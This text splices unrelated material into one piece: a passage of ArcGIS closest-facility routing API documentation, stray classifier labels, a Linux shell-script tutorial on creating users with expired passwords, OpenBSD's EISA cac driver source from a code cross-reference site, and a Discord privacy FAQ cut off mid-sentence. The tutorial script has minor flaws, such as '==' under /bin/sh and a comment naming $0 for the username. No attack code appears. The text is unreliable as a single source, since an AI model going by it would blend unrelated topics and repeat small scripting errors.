false (default)—Polyline barriers are not returned. Setting this parameter has no effect if you don't also specify a value for the polylineBarriers parameter. If you have specified the polylineBarriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, the returnPolylineBarriers parameter can be set to true so that you can draw the polyline barrier locations in your application. returnPolygonBarriers Specify whether polygon barriers will be returned by the service. • true—The input polygon barriers are returned as part of the polygonBarriers property in the JSON response. • false (default)—Polygon barriers are not returned. Setting this parameter has no effect if you don't also specify a value for the polygonBarriers parameter. If you have specified the polygonBarriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, the returnPolygonBarriers parameter can be set to true so that you can draw the polygon barrier locations in your application. ignoreInvalidLocations Specify whether invalid input locations should be ignored when finding the best solution. An input point is deemed invalid by the service if there are no streets within 12.42 miles (20 kilometers) of the stop location. • true (default)—Any invalid point in your request will cause the service to return a failure. • false—Invalid point are ignored. outSR Use this parameter to specify the spatial reference of the geometries, such as line or point features, returned by the service. The parameter value can be specified as a well-known ID (WKID) for the spatial reference. If env:outSR is not specified, the geometries are returned in the default spatial reference, WGS84. See Geographic coordinate systems and Projected coordinate systems to look up WKID values. Many of the basemaps provided by ArcGIS Online are in the Web Mercator spatial reference (WKID 102100). Specifying env:outSR=102100 returns the geometries in the Web Mercator spatial reference, which can be drawn on top of the basemaps. outputGeometryPrecision Use this parameter to specify by how much you want to simplify the route geometry returned by the service. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. Simplification maintains critical points on a route, such as turns at intersections, to define the essential shape of the route and removes other points. The simplification distance you specify is the maximum allowable offset that the simplified line can deviate from the original line. Simplifying a line reduces the number of vertices that are part of the route geometry. This reduces the overall response size and also improves the performance for drawing the route shapes in the applications. The default value for this parameter is 10. The units are specified with the outputGeometryPrecisionUnits parameter. outputGeometryPrecisionUnits Use this parameter to specify the units for the value specified for the outputGeometryPrecision parameter. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. The parameter value should be specified as one of the following values: • esriCentimeters • esriDecimalDegrees • esriDecimeters • esriFeet • esriInches • esriKilometers • esriMeters (default) • esriMiles • esriMillimeters • esriNauticalMiles • esriPoints • esriYards overrides Specify additional settings that can influence the behavior of the solver when finding solutions for the network analysis problems. The value for this parameter needs to be specified in JavaScript Object Notation (JSON). The values can be either a number, Boolean, or a string. { "overrideSetting1" : "value1", "overrideSetting2" : "value2" } The default value for this parameter is no value, which indicates not to override any solver settings. Overrides are advanced settings that should be used only after careful analysis of the results obtained before and after applying the settings. A list of supported override settings for each solver and their acceptable values can be obtained by contacting Esri Technical Support. JSON response The JSON response from the closest facility service is based on the following syntax. The actual properties returned in the response depend upon the request parameters. For example, the routes property is returned only if the returnCFRoutes parameter is set to true. If a request fails, the JSON response only contains the error property. The examples in the subsequent section illustrate the response returned with specific request parameters. JSON response syntax for successful request { "routes": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polyline1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polyline2> } }, //.... additional routes ] }, "facilities": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional facilities ] }, "incidents": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional incidents ] }, "barriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <point1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <point2> } }, //.... additional point barriers ] }, "polylineBarriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polyline1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polyline2> } }, //.... additional polyline barriers ] }, "polygonBarriers": { "spatialReference": { <spatialReference> }, "features": [ { "attributes": { "<field1>": <value11>, "<field2>": <value12> }, "geometry": { <polygon1> } }, { "attributes": { "<field1>": <value21>, "<field2>": <value22> }, "geometry": { <polygon2> } }, //.... additional polygon barriers ] }, "directions": [ { "routeId": <routeId1>, "routeName": "<routeName>", "summary": { "totalLength": <totalLength>, "totalTime": <totalTime>, "totalDriveTime": <totalDriveTime>, "envelope": { <envelope> } }, "features": [ { "attributes": { "length": <length1>, "time": <time1>, "text": "<text1>", "ETA": <ETA>, "maneuverType": "<maneuverType1>" }, "compressedGeometry": "<compressedGeometry1>" }, { "attributes": { "length": <length2>, "time": <time2>, "text": "<text2>", "maneuverType": "<maneuverType2>" }, "compressedGeometry": "<compressedGeometry2>" } ] }, { "routeId": <routeId2>, "routeName": "<routeName>", "summary": { "totalLength": <totalLength>, "totalTime": <totalTime>, "totalDriveTime": <totalDriveTime>, "envelope": { <envelope> } }, "features": [ { "attributes": { "length": <length1>, "time": <time1>, "text": "<text1>", "ETA": <ETA>, "maneuverType": "<maneuverType1>" }, "compressedGeometry": "<compressedGeometry1>" }, { "attributes": { "length": <length2>, "time": <time2>, "text": "<text2>", "maneuverType": "<maneuverType2>" }, "compressedGeometry": "<compressedGeometry2>" } ] }, //.... directions for additional routes ], "messages": [ { "type": <type1>, "description": <description1> }, { "type": <type1>, "description": <description1> }, //....additional messages ] } JSON response syntax for failed request. { "error": { "code": <code>, "message": "<message>", "details": [ "<details>" ] } } Usage limits The table below lists the limits that apply to this service. Limit DescriptionLimit Value Maximum number of incidents: 100 Maximum number of facilities: 100 Maximum number of facilities to find (per incident): 10 Maximum number of (point) barriers: 250 Maximum number of street features intersected by polyline barriers: 500 Maximum number of street features intersected by polygon barriers: 2,000 Force hierarchy beyond a straight-line distance of: (If the straight-line distance between any facility and incident is greater than the limit shown here, the analysis uses hierarchy, even if useHierarchy is set to false.) 50 miles (80.46 kilometers) Maximum snap tolerance: (If the distance between an input point and its nearest traversable street is greater than the distance specified here, the point is excluded from the analysis.) 12.42 miles (20 kilometers) Maximum time a client can use the synchronous closest facility service: 5 minutes (300 seconds) Examples Note: If you copy and paste the request URL from the examples into a web browser, you will get an invalid token error message. You need to replace <yourToken> with a valid token. See Accessing services provided by Esri to see how to generate one. Finding closest fire stations This example shows how to find the two fire stations that can provide the quickest response to a fire at a given incident location within three minutes. You will also generate routes and driving directions for the firefighters to follow. We specify the four fire stations in the area as the facilities parameter. We use the JSON structure to specify the facilities parameter as we want to specify the name of the fire station that can be used by the service when generating driving directions for the routes from the fire stations. The geometries are in the default spatial reference WGS84. Hence, the spatialReference property is not specified. We specify the longitude and latitude value for the fire location as the incidents parameter. Since we need to find the two closest fire stations, we specify 2 as the value for the defaultTargetFacilityCount parameter. In order to model the fire engines traveling from the stations to the fire (incident), we specify esriNATravelDirectionFromFacility as the value for the travelDirection parameter. We need to search for fire stations that are within three minutes of the fire. Hence we specify 3 as the value for the defaultCutoff parameter. Any fire stations outside the cutoff time are ignored by the service. As we need to generate driving directions and report the distance information within the directions in miles, we specify the returnDirections parameter as true and the directionsLengthUnits parameter as esriNAUMiles. In order to get the route geometries, we specify the returnCFRoutes parameter as true. We also specify the 102100 as the value for the outSR parameter so that the output routes are returned in the Web Mercator spatial reference and can be displayed on top of an ArcGIS Online basemap. Request URL http://route.arcgis.com/arcgis/rest/services/World/ClosestFacility/NAServer/ClosestFacility_World/solveClosestFacility?token=<yourToken>&incidents=-122.4496,37.7467&facilities={"features":[{"attributes":{"Name":"Station 11"},"geometry":{"x":-122.4267,"y":37.7486}},{"attributes":{"Name":"Station 20"},"geometry":{"x":-122.4561,"y":37.7513}},{"attributes":{"Name":"Station 24"},"geometry":{"x":-122.4409,"y":37.7533}},{"attributes":{"Name":"Station 39"},"geometry":{"x":-122.4578,"y":37.7407}}]}&defaultTargetFacilityCount=2&travelDirection=esriNATravelDirectionFromFacility&defaultCutoff=3&returnCFRoutes=true&returnDirections=true&directionsLengthUnits=esriNAUMiles&outSR=102100 JSON response The response contains two route features representing the best route to travel from the two closest fire stations to the incident. The response includes the routes and directions properties because the returnCFRoutesand returnDirections parameters are set to true in the request. Note: Because the response is quite verbose, the repeated elements within the response are abbreviated for clarity. { "messages": [], "routes": { "fieldAliases": { "ObjectID": "ObjectID", "FacilityID": "FacilityID", "FacilityRank": "FacilityRank", "Name": "Name", "IncidentCurbApproach": "IncidentCurbApproach", "FacilityCurbApproach": "FacilityCurbApproach", "IncidentID": "IncidentID", "Total_TravelTime": "Total_TravelTime", "Total_Kilometers": "Total_Kilometers", "Total_Miles": "Total_Miles", "Shape_Length": "Shape_Length" }, "geometryType": "esriGeometryPolyline", "spatialReference": { "wkid": 102100, "latestWkid": 3857 }, "features": [ { "attributes": { "ObjectID": 1, "FacilityID": 4, "FacilityRank": 1, "Name": "Station 39 - Location 1", "IncidentCurbApproach": 2, "FacilityCurbApproach": 1, "IncidentID": 1, "Total_TravelTime": 1.7600910249204684, "Total_Kilometers": 1.0394628115064781, "Total_Miles": 0.6458922464721514, "Shape_Length": 1309.3896042400702 }, "geometry": { "paths": [ [ [ -13631945.0834, 4542876.163199998 ], [ -13631904.317499999, 4542899.317500003 ], //.... additional points in the route ] ] } }, { "attributes": { "ObjectID": 2, "FacilityID": 2, "FacilityRank": 2, "Name": "Station 20 - Location 1", "IncidentCurbApproach": 1, "FacilityCurbApproach": 1, "IncidentID": 1, "Total_TravelTime": 1.898575185300166, "Total_Kilometers": 0.9460863750832559, "Total_Miles": 0.5878708188449802, "Shape_Length": 1229.0645653105717 }, "geometry": { "paths": [ [ [ -13631749.8412, 4544361.9076000005 ], [ -13631561.4534, 4544343.7250000015 ], //.... additional points in the route ] ] } } ] }, "directions": [ { "routeId": 1, "routeName": "Station 39 - Location 1", "summary": { "totalLength": 0.6458978652647239, "totalTime": 1.7600910260807723, "totalDriveTime": 1.7600910249204682, "envelope": { "xmin": -13631945.083355796, "ymin": 4542859.901880716, "xmax": -13631013.761512483, "ymax": 4543705.678939983, "spatialReference": { "wkid": 102100, "latestWkid": 3857 } } }, "features": [ { "attributes": { "length": 0, "time": 0, "text": "Start at Station 39", "ETA": -2209161600000, "maneuverType": "esriDMTDepart" }, "compressedGeometry": "+1-d00e8+4akcs+0+0" }, { "attributes": { "length": 0.5233336473178214, "time": 1.4396464250141916, "text": "Go northeast on PORTOLA DR toward REX AVE", "ETA": -2209161600000, "maneuverType": "esriDMTStraight" }, "compressedGeometry": "+1-d00e8+4akcs+19+n+40+2p+16+12+l+12+22+45+1j+21+1t+22+29+20+51+3n+1m+u+2r+16" }, { "attributes": { "length": 0.1137367543451464, "time": 0.29078273135879606, "text": "Turn left on TWIN PEAKS BLVD", "ETA": -2209161600000, "maneuverType": "esriDMTTurnLeft" }, "compressedGeometry": "+1-cvvln+4al2j-7+19+3+c+9+9+1o+8+i+9+23+1b" }, { "attributes": { "length": 0.008827463601756125, "time": 0.02966186854748069, "text": "Make sharp left on PANORAMA DR", "ETA": -2209161600000, "maneuverType": "esriDMTSharpLeft" }, "compressedGeometry": "+1-cvvh5+4al6d-c+d" }, { "attributes": { "length": 0, "time": 0, "text": "Finish at Location 1", "ETA": -2209161600000, "maneuverType": "esriDMTStop" }, "compressedGeometry": "+1-cvvhh+4al6q+0+0" } ] }, { "routeId": 2, "routeName": "Station 20 - Location 1", "summary": { "totalLength": 0.5878759328933506, "totalTime": 1.8985751853324473, "totalDriveTime": 1.898575185300166, "envelope": { "xmin": -13631750.69648736, "ymin": 4543704.557076369, "xmax": -13631026.43439348, "ymax": 4544361.9075978, "spatialReference": { "wkid": 102100, "latestWkid": 3857 } } }, "features": [ { "attributes": { "length": 0, "time": 0, "text": "Start at Station 20", "ETA": -2209161600000, "maneuverType": "esriDMTDepart" }, "compressedGeometry": "+1-d0085+4alra+0+0" }, { "attributes": { "length": 0.21782291983305227, "time": 0.6974671774325343, "text": "Go east on OLYMPIA WAY toward DELLBROOK AVE", "ETA": -2209161600000, "maneuverType": "esriDMTStraight" }, "compressedGeometry": "+1-d0085+4alra+37-4+2m-e+3g-a+4a+6" }, { "attributes": { "length": 0.3700530130602983, "time": 1.2011080078676315, "text": "Turn right on PANORAMA DR", "ETA": -2209161600000, "maneuverType": "esriDMTTurnRight" }, "compressedGeometry": "+1-cvvqe+4alqk+6-c6+a-t+4e-5s+h-7+2k+0+q-k" }, { "attributes": { "length": 0, "time": 0, "text": "Finish at Location 1", "ETA": -2209161600000, "maneuverType": "esriDMTStop" }, "compressedGeometry": "+1-cvvhh+4al6q+0+0" } ] } ] }
__label__pos
0.774176
Linux Script to Add User and Password Expiry with Conditional Checks Linux Script to Add User and Password Expiry with Conditional Checks In the last article, we’d seen how to get started with Linux scripts. In that, we created a basic scripting file and showed how to change permissions and add the path variables (or use the existing ones). Now that we know the skeleton of a basic script, it’s time to show how it can actually be useful. In an earlier article, we’d taken a look at how to expire passwords in Linux. When the user logs in for the first time, we want to force them to change their password. This consists of three steps: 1. Create the user; 2. Set a default password; 3. Expire the password immediately. The commands for these three actions are as follows: useradd [username] passwd [username] passwd -e [username] Running them separately gives us the following output: To execute these, we need to learn about Linux script parameters. Script Parameters To string these three commands together, we’re going to create our own script called “adduserexpass”. This command will take in the username as a parameter and execute the above three commands together. When we run our script, we will pass the desired username as a parameter like this: adduserexpass [username] Scripts can reference parameters by using the following method: • $0 equals the script name itself; • $1 refers to the first parameter; • $2 refers to the second parameter; • …and so on and so forth. So in the above example, we refer to [username] using $1. So the three commands within the script simply become: useradd $1 passwd $1 passwd -e $1 Input Verification It’s important for us to check the validity of an input before we manipulate it. For example, the script makes no sense unless we actually provide a parameter. So the first thing we’re going to do is to check whether or not a parameter exists. If not, we display an error message and exit the script. Like this: if [ "$1" == "" ]; then echo "Missing username parameter" exit 1 fi A few things to note about this conditional statement. First, it’s important to keep whitespaces around the square bracket “[” in the following statement: if [ "$1" == "" ] This is because shell scripts are not strictly a programming language by themselves. Without the brackets, the Linux environment treats the entire string as a single command. Second, note that the parameter $1 is surrounded by quotation marks (“”). All of these little things can make debugging very difficult for Linux shell scripts. The best way to code them is to find an existing script that works and make the changes to them. Also unlike many other programming languages, you don’t need to end every command with a semi-colon “;”. However, if the next piece of the code is on the same line, then the semicolon is necessary to separate the commands from one other like in this extract: if [ "$1" == "" ]; then Here, the “then” is on the same line. So we need the semicolon after the closing bracket. Check if username Already Exists We also need to make sure that we’re not passing an existing username to the script. Otherwise, we’ll end up resetting the password and expiring it for an existing user! The way to do this is to use the “id -u” command and test the output like this: if id -u "$1" >/dev/null 2>&1; then echo "User already exists" exit 1 fi In this conditional statement, I execute the command “id -u $1”. I don’t want the output to be shown in the shell, so I send it to an imaginary black hole /dev/null . However if something was returned, then we echo that the user already exists and exit the script. Putting it all Together Taking all the components together, we have the following final script: #!/bin/sh # This will take the username as a parameter referred to as $0 if [ "$1" == "" ]; then echo "Missing username parameter" exit 1 fi if id -u "$1" >/dev/null 2>&1; then echo "User already exists" exit 1 fi useradd $1 passwd $1 passwd -e $1 This gives us the output when run under the following scenarios: Missing username: Username already exists: User created, password set, and expired all with one command: Linux script to add user and password And there we have a script that executes three commands all at once with full conditional statements that check for invalid inputs! This technique can be use to automate a whole bunch of tasks in Linux that could normally be pretty time consuming. The flexibility to accept parameters allows us to create new commands that we can then distribute to other people as well. Leave a Reply Your email address will not be published. Required fields are marked * Disclosure: We receive a compensation from some of the companies whose products are presented on our website.
__label__pos
0.82837
The Design and Implementation of the FreeBSD Operating System, Second Edition Now available: The Design and Implementation of the FreeBSD Operating System (Second Edition) [ source navigation ] [ diff markup ] [ identifier search ] [ freetext search ] [ file search ] [ list types ] [ track identifier ] FreeBSD/Linux Kernel Cross Reference sys/dev/eisa/cac_eisa.c Version: -  FREEBSD  -  FREEBSD-12-STABLE  -  FREEBSD-12-0  -  FREEBSD-11-STABLE  -  FREEBSD-11-2  -  FREEBSD-11-1  -  FREEBSD-11-0  -  FREEBSD-10-STABLE  -  FREEBSD-10-4  -  FREEBSD-10-3  -  FREEBSD-10-2  -  FREEBSD-10-1  -  FREEBSD-10-0  -  FREEBSD-9-STABLE  -  FREEBSD-9-3  -  FREEBSD-9-2  -  FREEBSD-9-1  -  FREEBSD-9-0  -  FREEBSD-8-STABLE  -  FREEBSD-8-4  -  FREEBSD-8-3  -  FREEBSD-8-2  -  FREEBSD-8-1  -  FREEBSD-8-0  -  FREEBSD-7-STABLE  -  FREEBSD-7-4  -  FREEBSD-7-3  -  FREEBSD-7-2  -  FREEBSD-7-1  -  FREEBSD-7-0  -  FREEBSD-6-STABLE  -  FREEBSD-6-4  -  FREEBSD-6-3  -  FREEBSD-6-2  -  FREEBSD-6-1  -  FREEBSD-6-0  -  FREEBSD-5-STABLE  -  FREEBSD-5-5  -  FREEBSD-5-4  -  FREEBSD-5-3  -  FREEBSD-5-2  -  FREEBSD-5-1  -  FREEBSD-5-0  -  FREEBSD-4-STABLE  -  FREEBSD-3-STABLE  -  FREEBSD22  -  linux-2.6  -  linux-2.4.22  -  MK83  -  MK84  -  PLAN9  -  DFBSD  -  NETBSD  -  NETBSD5  -  NETBSD4  -  NETBSD3  -  NETBSD20  -  OPENBSD  -  xnu-517  -  xnu-792  -  xnu-792.6.70  -  xnu-1228  -  xnu-1456.1.26  -  xnu-1699.24.8  -  xnu-2050.18.24  -  OPENSOLARIS  -  minix-3-1-1  SearchContext: -  none  -  3  -  10  1 /* $OpenBSD: cac_eisa.c,v 1.3 2008/06/26 05:42:14 ray Exp $ */ 2 /* $NetBSD: cac_eisa.c,v 1.1 2000/09/01 12:15:20 ad Exp $ */ 3 4 /*- 5 * Copyright (c) 2000 The NetBSD Foundation, Inc. 6 * All rights reserved. 7 * 8 * This code is derived from software contributed to The NetBSD Foundation 9 * by Andrew Doran. 10 * 11 * Redistribution and use in source and binary forms, with or without 12 * modification, are permitted provided that the following conditions 13 * are met: 14 * 1. Redistributions of source code must retain the above copyright 15 * notice, this list of conditions and the following disclaimer. 16 * 2. Redistributions in binary form must reproduce the above copyright 17 * notice, this list of conditions and the following disclaimer in the 18 * documentation and/or other materials provided with the distribution. 19 * 20 * THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS 21 * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 22 * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 23 * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS 24 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 * POSSIBILITY OF SUCH DAMAGE. 31 */ 32 33 /* 34 * Copyright (c) 2000 Jonathan Lemon 35 * Copyright (c) 1999 by Matthew N. Dodd <[email protected]> 36 * All Rights Reserved. 37 * 38 * Redistribution and use in source and binary forms, with or without 39 * modification, are permitted provided that the following conditions 40 * are met: 41 * 1. Redistributions of source code must retain the above copyright 42 * notice, this list of conditions, and the following disclaimer, 43 * without modification, immediately at the beginning of the file. 44 * 2. The name of the author may not be used to endorse or promote products 45 * derived from this software without specific prior written permission. 46 * 47 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND 48 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 49 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 50 * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR 51 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 52 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 53 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 54 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 55 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 56 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 57 * SUCH DAMAGE. 58 */ 59 60 /* 61 * EISA front-end for cac(4) driver. 62 */ 63 64 #include <sys/types.h> 65 #include <sys/param.h> 66 #include <sys/systm.h> 67 #include <sys/device.h> 68 69 #include <machine/bus.h> 70 #include <machine/intr.h> 71 72 #include <dev/eisa/eisavar.h> 73 #include <dev/eisa/eisadevs.h> 74 75 #include <scsi/scsi_all.h> 76 #include <scsi/scsi_disk.h> 77 #include <scsi/scsiconf.h> 78 79 #include <dev/ic/cacreg.h> 80 #include <dev/ic/cacvar.h> 81 82 #define CAC_EISA_SLOT_OFFSET 0x0c88 83 #define CAC_EISA_IOSIZE 0x0017 84 #define CAC_EISA_IOCONF 0x38 85 86 int cac_eisa_match(struct device *, void *, void *); 87 void cac_eisa_attach(struct device *, struct device *, void *); 88 89 struct cac_ccb *cac_eisa_l0_completed(struct cac_softc *); 90 int cac_eisa_l0_fifo_full(struct cac_softc *); 91 void cac_eisa_l0_intr_enable(struct cac_softc *, int); 92 int cac_eisa_l0_intr_pending(struct cac_softc *); 93 void cac_eisa_l0_submit(struct cac_softc *, struct cac_ccb *); 94 95 struct cfattach cac_eisa_ca = { 96 sizeof(struct cac_softc), cac_eisa_match, cac_eisa_attach 97 }; 98 99 static const 100 struct cac_linkage cac_eisa_l0 = { 101 cac_eisa_l0_completed, 102 cac_eisa_l0_fifo_full, 103 cac_eisa_l0_intr_enable, 104 cac_eisa_l0_intr_pending, 105 cac_eisa_l0_submit 106 }; 107 108 static const 109 struct cac_eisa_type { 110 const char *ct_prodstr; 111 const char *ct_typestr; 112 const struct cac_linkage *ct_linkage; 113 } cac_eisa_type[] = { 114 { "CPQ4001", "IDA", &cac_eisa_l0 }, 115 { "CPQ4002", "IDA-2", &cac_eisa_l0 }, 116 { "CPQ4010", "IEAS", &cac_eisa_l0 }, 117 { "CPQ4020", "SMART", &cac_eisa_l0 }, 118 { "CPQ4030", "SMART-2/E", &cac_l0 }, 119 }; 120 121 int 122 cac_eisa_match(parent, match, aux) 123 struct device *parent; 124 void *match, *aux; 125 { 126 struct eisa_attach_args *ea; 127 int i; 128 129 ea = aux; 130 131 for (i = 0; i < sizeof(cac_eisa_type) / sizeof(cac_eisa_type[0]); i++) 132 if (strcmp(ea->ea_idstring, cac_eisa_type[i].ct_prodstr) == 0) 133 return (1); 134 135 return (0); 136 } 137 138 void 139 cac_eisa_attach(parent, self, aux) 140 struct device *parent; 141 struct device *self; 142 void *aux; 143 { 144 struct eisa_attach_args *ea; 145 bus_space_handle_t ioh; 146 eisa_chipset_tag_t ec; 147 eisa_intr_handle_t ih; 148 struct cac_softc *sc; 149 bus_space_tag_t iot; 150 const char *intrstr; 151 int irq, i; 152 153 ea = aux; 154 sc = (struct cac_softc *)self; 155 iot = ea->ea_iot; 156 ec = ea->ea_ec; 157 158 if (bus_space_map(iot, EISA_SLOT_ADDR(ea->ea_slot) + 159 CAC_EISA_SLOT_OFFSET, CAC_EISA_IOSIZE, 0, &ioh)) { 160 printf(": can't map i/o space\n"); 161 return; 162 } 163 164 sc->sc_iot = iot; 165 sc->sc_ioh = ioh; 166 sc->sc_dmat = ea->ea_dmat; 167 168 /* 169 * Map and establish the interrupt. 170 */ 171 switch (bus_space_read_1(iot, ioh, CAC_EISA_IOCONF) & 0xf0) { 172 case 0x20: 173 irq = 10; 174 break; 175 case 0x10: 176 irq = 11; 177 break; 178 case 0x40: 179 irq = 14; 180 break; 181 case 0x80: 182 irq = 15; 183 break; 184 default: 185 printf(": controller on invalid IRQ\n"); 186 return; 187 } 188 189 if (eisa_intr_map(ec, irq, &ih)) { 190 printf(": can't map interrupt (%d)\n", irq); 191 return; 192 } 193 194 intrstr = eisa_intr_string(ec, ih); 195 if ((sc->sc_ih = eisa_intr_establish(ec, ih, IST_LEVEL, IPL_BIO, 196 cac_intr, sc, sc->sc_dv.dv_xname)) == NULL) { 197 printf(": can't establish interrupt"); 198 if (intrstr != NULL) 199 printf(" at %s", intrstr); 200 printf("\n"); 201 return; 202 } 203 204 /* 205 * Print board type and attach to the bus-independent code. 206 */ 207 for (i = 0; i < sizeof(cac_eisa_type) / sizeof(cac_eisa_type[0]); i++) 208 if (strcmp(ea->ea_idstring, cac_eisa_type[i].ct_prodstr) == 0) 209 break; 210 211 printf(" %s: Compaq %s\n", intrstr, cac_eisa_type[i].ct_typestr); 212 sc->sc_cl = cac_eisa_type[i].ct_linkage; 213 cac_init(sc, 0); 214 } 215 216 /* 217 * Linkage specific to EISA boards. 218 */ 219 220 int 221 cac_eisa_l0_fifo_full(struct cac_softc *sc) 222 { 223 224 return ((cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) & 225 CAC_EISA_CHANNEL_CLEAR) == 0); 226 } 227 228 void 229 cac_eisa_l0_submit(struct cac_softc *sc, struct cac_ccb *ccb) 230 { 231 u_int16_t size; 232 233 /* 234 * On these boards, `ccb_hdr.size' is actually for control flags. 235 * Set it to zero and pass the value by means of an I/O port. 236 */ 237 size = letoh16(ccb->ccb_hdr.size) << 2; 238 ccb->ccb_hdr.size = 0; 239 240 bus_dmamap_sync(sc->sc_dmat, sc->sc_dmamap, (caddr_t)ccb - sc->sc_ccbs, 241 sizeof(struct cac_ccb), BUS_DMASYNC_PREWRITE | BUS_DMASYNC_PREREAD); 242 243 cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL, CAC_EISA_CHANNEL_CLEAR); 244 cac_outl(sc, CAC_EISAREG_LIST_ADDR, ccb->ccb_paddr); 245 cac_outw(sc, CAC_EISAREG_LIST_LEN, size); 246 cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL, CAC_EISA_CHANNEL_BUSY); 247 } 248 249 struct cac_ccb * 250 cac_eisa_l0_completed(struct cac_softc *sc) 251 { 252 struct cac_ccb *ccb; 253 u_int32_t off; 254 u_int8_t status; 255 256 if ((cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) & 257 CAC_EISA_CHANNEL_BUSY) == 0) 258 return (NULL); 259 260 cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL, CAC_EISA_CHANNEL_BUSY); 261 off = cac_inl(sc, CAC_EISAREG_COMPLETE_ADDR); 262 status = cac_inb(sc, CAC_EISAREG_LIST_STATUS); 263 cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL, CAC_EISA_CHANNEL_CLEAR); 264 265 if (off == 0) 266 return (NULL); 267 268 off = (off & ~3) - sc->sc_ccbs_paddr; 269 ccb = (struct cac_ccb *)(sc->sc_ccbs + off); 270 271 bus_dmamap_sync(sc->sc_dmat, sc->sc_dmamap, off, sizeof(struct cac_ccb), 272 BUS_DMASYNC_POSTWRITE | BUS_DMASYNC_POSTREAD); 273 274 ccb->ccb_req.error = status; 275 return (ccb); 276 } 277 278 int 279 cac_eisa_l0_intr_pending(struct cac_softc *sc) 280 { 281 282 return (cac_inb(sc, CAC_EISAREG_SYSTEM_DOORBELL) & 283 CAC_EISA_CHANNEL_BUSY); 284 } 285 286 void 287 cac_eisa_l0_intr_enable(struct cac_softc *sc, int state) 288 { 289 290 if (state) { 291 cac_outb(sc, CAC_EISAREG_SYSTEM_DOORBELL, 292 ~CAC_EISA_CHANNEL_CLEAR); 293 cac_outb(sc, CAC_EISAREG_LOCAL_DOORBELL, 294 CAC_EISA_CHANNEL_BUSY); 295 cac_outb(sc, CAC_EISAREG_INTR_MASK, CAC_INTR_ENABLE); 296 cac_outb(sc, CAC_EISAREG_SYSTEM_MASK, CAC_INTR_ENABLE); 297 } else 298 cac_outb(sc, CAC_EISAREG_SYSTEM_MASK, CAC_INTR_DISABLE); 299 } Cache object: 1fbad95ba9a74817b6859924844ae402 [ source navigation ] [ diff markup ] [ identifier search ] [ freetext search ] [ file search ] [ list types ] [ track identifier ] This page is part of the FreeBSD/Linux Linux Kernel Cross-Reference, and was automatically generated using a modified version of the LXR engine.
__label__pos
0.950491
If you looking to get solution of Discord how to make a server private then must check given helpful tips & tricks and guides. We have listed all the related questions to provide you as much best possible solution. 1. Disable all permission for @everyone 1. Head into the Roles tab in your Server Settings menu. 2. Select the default @everyone role and then scroll all the way to the bottom of the permissions page. 3. Once you scroll all the way down, you’ll be able to click on the Clear Role Permissions button! How private are private Discord servers? Even if no one’s snooping on your private streams, Discord shouldn’t be treated like a secure line. Your private messages are not end-to-end encrypted, and data breaches are a possibility on any online platform (Discord has a bounty out on vulnerabilities (opens in new tab)). Can I hide servers in Discord? Tap the server’s name at the top of your screen. Alternatively, you can tap the three-dot icon to access more options. Once the options appear on your screen, drag it up and toggle “Hide muted channels.” Can anyone join my Discord server? However, it’s important to remember that the only way anyone can access your server is through an invite link so be careful with who you give it to! Once 